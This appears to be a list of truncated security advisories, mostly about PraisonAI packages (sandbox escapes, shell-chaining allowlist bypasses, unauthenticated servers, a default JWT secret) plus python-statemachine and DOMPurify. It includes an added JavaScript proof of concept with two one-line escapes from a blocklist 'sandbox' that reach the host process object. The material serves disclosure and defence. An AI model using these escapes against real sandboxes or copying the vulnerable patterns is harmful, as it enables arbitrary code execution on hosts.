python-statemachine SCXML <data expr> Eval Injection
Summary: python-statemachine 3.1.2 evaluates attributes in SCXML documents using Python's eval. Any application that passes attacker-controlled SCXML content to SCXMLProcessor is vulnerable to arbitrary code execution in the context of the hosting process. Details: SCXMLProcessor.parse_scxml_file...
GHSA-CMWH-PVXP-8882 DOMPurify: Permanent `ALLOWED_ATTR` pollution via `setConfig()` bypassing the hook clone-guard (incomplete fix of the 3.4.7 hook-pollution patch)
Summary: DOMPurify 3.4.7 shipped a security fix for "permanent hook pollution" that makes a registered uponSanitizeAttribute hook's mutation of data.allowedAttributes non-persistent — so allowing an attribute for one element does not leak into later sanitize calls. The fix clones ALLOWED_ATTR inside...
GHSA-CWJ8-7GP2-GGCW praisonai-platform: default JWT signing secret 'dev-secret-change-me' enables token forgery
praisonai-platform: default JWT signing secret dev-secret-change-me Researcher: Kai Aizen — SnailSploit @SnailSploit, Adversarial & Offensive Security Research Target: https://github.com/MervinPraison/PraisonAI --- Package: praisonai-platform on PyPI Latest version and version tested: 0.1.4,...
GHSA-6JCQ-6546-QRRW PraisonAI SandlockSandbox falls back to unrestricted subprocess execution when Landlock is unavailable
Summary: praisonai.sandbox.SandlockSandbox is documented and implemented as the kernel-enforced sandbox backend for untrusted code. Its SandboxConfig.native path lets callers configure allowed filesystem paths and network=False. On systems where the optional sandlock module imports but reports tha...
GHSA-5JV7-2MJM-H6QJ npm PraisonAI utility shell safe-command wrapper allowlist bypass via shell chaining
Summary: The published npm package praisonai ships dist/tools/utility-tools.js, which exports a shellcommand helper described in source as "Execute shell command safe version - read-only commands". The helper attempts to enforce a safe read-only command allowlist by checking only the first...
GHSA-J4F3-55X4-R6Q2 npm PraisonAI MCPServer exposes unauthenticated HTTP tools/call
Summary: The published npm package praisonai exports a TypeScript MCPServer that can expose tools, resources, and prompts over an HTTP JSON-RPC transport with `await server.start({ port: 3000 });`. The HTTP transport has no authentication or authorization path. MCPServerConfig does not expose an...
GHSA-9752-MHQH-H34F npm PraisonAI AgentOS exposes unauthenticated agent listing and invocation
Summary: The published npm package praisonai ships a TypeScript AgentOS HTTP server that defaults to host: "0.0.0.0" and registers sensitive agent routes without any authentication or authorization middleware. When a developer starts AgentOS, a network attacker who can reach the service can: - rea...
GHSA-P69M-4F92-2V84 PraisonAI: Remote Code Execution via Sandbox Escape in `codeMode` Tool
Summary: The codeMode tool in src/praisonai-ts/src/tools/builtins/code-mode.ts uses new Function with a `with (sandbox)` pattern to execute LLM-generated code. The blocklist-based "sandbox" can be trivially bypassed via `Function('return this')` to recover the global object, followed by global.require with...
GHSA-VJV9-7M7J-H833 npm PraisonAI SandboxExecutor allowedCommands bypass via shell chaining
Summary: The published npm package praisonai exports SandboxExecutor, CommandValidator, and sandboxExec as "safe command execution with restrictions." When allowedCommands is configured, CommandValidator checks only the first whitespace-delimited token of the command string. SandboxExecutor then...
GHSA-VMMJ-PFW7-FJWP npm PraisonAI codeMode sandbox escape via Function constructor
Summary: The published npm package praisonai exports a TypeScript built-in tool named codeMode. The package describes this tool as executing code in a sandboxed environment, marks its capability as sandbox: true, and registers it through the public tools facade. The implementation does not create ...
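The `new Function` plus `with (sandbox)` plus blocklist construction behind both codeMode advisories, as an added example that is not praisonai's code: a toy sandbox of that shape, the `Function('return this')` escape the advisory names, and, going one step further than the advisory text, the `[].constructor.constructor` route that still works when a Proxy scope hides every free name. The payloads read `process.version` only, as a harmless proof that the real global object was reached; the point is that no in-process JavaScript blocklist is a security boundary.

```javascript
// Added example (not praisonai's code): a blocklist "sandbox" in the shape
// the advisory describes, built as a toy here, and two one-line escapes.

// 1. String blocklist plus `with` scoping: free names resolve against an
//    empty scope object first, and code mentioning blocked names is refused.
function makeBlocklistSandbox(blocked = ['process', 'require', 'globalThis', 'eval']) {
  return function run(code) {
    for (const word of blocked) {
      if (code.includes(word)) throw new Error(`blocked identifier: ${word}`);
    }
    const scope = Object.create(null);
    // new Function bodies are sloppy-mode, so `with` is permitted here.
    return new Function('scope', `with (scope) { return (${code}); }`)(scope);
  };
}

// 2. Stricter variant: a Proxy claims every free name exists and is undefined,
//    so `Function`, `process`, `require`, ... cannot be reached by name at all.
function makeProxySandbox() {
  const scope = new Proxy(Object.create(null), {
    has: () => true,
    get: () => undefined,
  });
  return (code) => new Function('scope', `with (scope) { return (${code}); }`)(scope);
}

// The escape named in the advisory: a sloppy-mode function's `this` is the
// real global object. 'pro' + 'cess' keeps the literal word off the blocklist.
const ESCAPE_VIA_FUNCTION = "Function('return this')()['pro' + 'cess'].version";

// Same idea without naming Function: any literal's constructor chain reaches it.
const ESCAPE_VIA_CONSTRUCTOR = "[].constructor.constructor('return this')()['pro' + 'cess'].version";

// Returns true if the payload, run inside `run`, obtained the host's process object.
function tryEscape(run, code) {
  try {
    return run(code) === process.version;
  } catch {
    return false;
  }
}
```

`tryEscape(makeBlocklistSandbox(), ESCAPE_VIA_FUNCTION)` is true, and the Proxy variant only moves the goalposts: it stops the named lookup and is beaten by the constructor route. Untrusted or LLM-generated code needs a separate process or isolate with its own resource and permission limits, not a filtered `new Function`.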
npm PraisonAI MCPSecurity Basic/OAuth authentication policies accept invalid credentials without validation
Summary: The published npm package praisonai exports an MCPSecurity helper described in source as "MCP Security - Authentication, authorization, and rate limiting. Provides security policies for MCP servers." Its AuthMethod type advertises five authentication methods (`export type AuthMethod ...`